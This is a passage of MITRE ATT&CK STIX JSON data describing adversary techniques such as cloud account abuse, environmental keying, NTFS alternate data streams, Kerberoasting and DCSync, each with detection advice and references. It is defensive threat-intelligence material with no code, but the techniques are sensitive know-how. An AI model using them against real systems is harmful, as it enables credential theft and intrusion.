security controls such as multi-factor authentication. \n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. \n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jon Sternstein, Stern Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "Office 365", "SaaS", "IaaS", "Google Workspace"], "x_mitre_version": "1.7", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", "created": "2020-03-13T20:36:57.378Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1078/004", "external_id": "T1078.004"}, {"source_name": "AWS Identity Federation", "description": "Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.", "url": "https://aws.amazon.com/identity/federation/"}, {"source_name": "Google Federating GC", "description": "Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.", "url": "https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction"}, {"source_name": "Microsoft Deploying AD Federation", "description": "Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.", "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Environmental Keying", "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Nick Carr, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host Forensic Analysis", "Signature-based Detection", "Static File Analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "created": "2020-06-23T22:28:28.041Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1480/001", "external_id": "T1480.001"}, {"source_name": "Proofpoint Router Malvertising", "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.", "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices"}, {"source_name": "Kaspersky Gauss Whitepaper", "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf"}, {"source_name": "Ebowla: Genetic Malware", "description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.", "url": "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf"}, {"source_name": "EK Clueless Agents", "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.", "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf"}, {"source_name": "EK Impeding Malware Analysis", "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.", "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf"}, {"source_name": "Demiguise Guardrail Router Logo", "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.", "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js"}, {"source_name": "Environmental Keyed HTA", "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.", "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Fallback Channels", "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "created": "2017-05-31T21:30:21.689Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1008", "external_id": "T1008"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-14T21:56:34.831Z", "name": "NTFS File Attributes", "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Oddvar Moe, @oddvarmoe", "Red Canary"], "x_mitre_deprecated": false, "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host forensic analysis", "Signature-based detection"], "x_mitre_system_requirements": ["NTFS partitioned hard drive"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "created": "2020-03-13T20:33:00.009Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/004", "external_id": "T1564.004"}, {"source_name": "MalwareBytes ADS July 2015", "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.", "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"}, {"source_name": "SpectorOps Host-Based Jul 2017", "description": "Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.", "url": "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea"}, {"source_name": "Journey into IR ZeroAccess NTFS EA", "description": "Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.", "url": "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html"}, {"source_name": "Microsoft NTFS File Attributes Aug 2010", "description": "Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.", "url": "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/"}, {"source_name": "Microsoft ADS Mar 2014", "description": "Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.", "url": "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/"}, {"source_name": "Microsoft File Streams", "description": "Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.", "url": "http://msdn.microsoft.com/en-us/library/aa364404"}, {"source_name": "Oddvar Moe ADS2 Apr 2018", "description": "Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.", "url": "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/"}, {"source_name": "Oddvar Moe ADS1 Jan 2018", "description": "Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.", "url": "https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"}, {"source_name": "Symantec ADS May 2009", "description": "Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.", "url": "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-03-30T21:01:46.538Z", "name": "Kerberoasting", "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Valid domain account or the ability to sniff traffic within a domain"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", "created": "2020-02-11T18:43:38.588Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1558/003", "external_id": "T1558.003"}, {"source_name": "Empire InvokeKerberoast Oct 2016", "description": "EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.", "url": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1"}, {"source_name": "AdSecurity Cracking Kerberos Dec 2015", "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", "url": "https://adsecurity.org/?p=2293"}, {"source_name": "Microsoft Detecting Kerberoasting Feb 2018", "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/"}, {"source_name": "Microsoft SPN", "description": "Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.", "url": "https://msdn.microsoft.com/library/ms677949.aspx"}, {"source_name": "Microsoft SetSPN", "description": "Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.", "url": "https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx"}, {"source_name": "SANS Attacking Kerberos Nov 2014", "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", "url": "https://redsiege.com/kerberoast-slides"}, {"source_name": "Harmj0y Kerberoast Nov 2016", "description": "Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.", "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "NTFS File Attributes", "description": "Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Red Canary", "Oddvar Moe, @oddvarmoe"], "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Signature-based detection", "Host forensic analysis", "Anti-virus"], "x_mitre_system_requirements": ["NTFS partitioned hard drive"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f2d44246-91f1-478a-b6c8-1227e0ca109d", "created": "2017-05-31T21:31:11.147Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1096", "external_id": "T1096"}, {"source_name": "SpectorOps Host-Based Jul 2017", "description": "Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.", "url": "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea"}, {"source_name": "Microsoft NTFS File Attributes Aug 2010", "description": "Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.", "url": "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/"}, {"source_name": "Microsoft File Streams", "description": "Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.", "url": "http://msdn.microsoft.com/en-us/library/aa364404"}, {"source_name": "MalwareBytes ADS July 2015", "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.", "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"}, {"source_name": "Microsoft ADS Mar 2014", "description": "Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.", "url": "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/"}, {"source_name": "Journey into IR ZeroAccess NTFS EA", "description": "Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.", "url": "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html"}, {"source_name": "Oddvar Moe ADS1 Jan 2018", "description": "Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.", "url": "https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"}, {"source_name": "Oddvar Moe ADS2 Apr 2018", "description": "Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.", "url": "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/"}, {"source_name": "Symantec ADS May 2009", "description": "Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.", "url": "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "DCSync", "description": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.\n\nMembers of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)\n\nDCSync functionality has been included in the \"lsadump\" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ExtraHop", "Vincent Le Toux"], "x_mitre_detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", "created": "2020-02-11T18:45:34.293Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/006", "external_id": "T1003.006"}, {"source_name": "Microsoft DRSR Dec 2017", "description": "Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.", "url": "https://msdn.microsoft.com/library/cc228086.aspx"}, {"source_name": "Microsoft GetNCCChanges", "description": "Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.", "url": "https://msdn.microsoft.com/library/dd207691.aspx"}, {"source_name": "Samba DRSUAPI", "description": "SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.", "url": "https://wiki.samba.org/index.php/DRSUAPI"}, {"source_name": "Wine API samlib.dll", "description": "Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.", "url": "https://source.winehq.org/WineAPI/samlib.html"}, {"source_name": "ADSecurity Mimikatz DCSync", "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved August 7, 2017.", "url": "https://adsecurity.org/?p=1729"}, {"source_name": "Harmj0y Mimikatz and DCSync", "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017.", "url": "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/"}, {"source_name": "InsiderThreat ChangeNTLM July 2017", "description": "Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.", "url": "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM"}, {"source_name": "GitHub Mimikatz lsadump Module", "description": "Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved August 7, 2017.", "url": "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump"}, {"source_name": "Microsoft NRPC Dec 2017", "description": "Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.", "url": "https://msdn.microsoft.com/library/cc237008.aspx"}, {"source_name": "Microsoft SAMR", "description": "Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.", "url": "https://msdn.microsoft.com/library/cc245496.aspx"}, {"source_name": "AdSecurity DCSync Sept 2015", "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", "url": "https://adsecurity.org/?p=1729"}, {"source_name": "Harmj0y DCSync Sept 2015", "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.", "url": 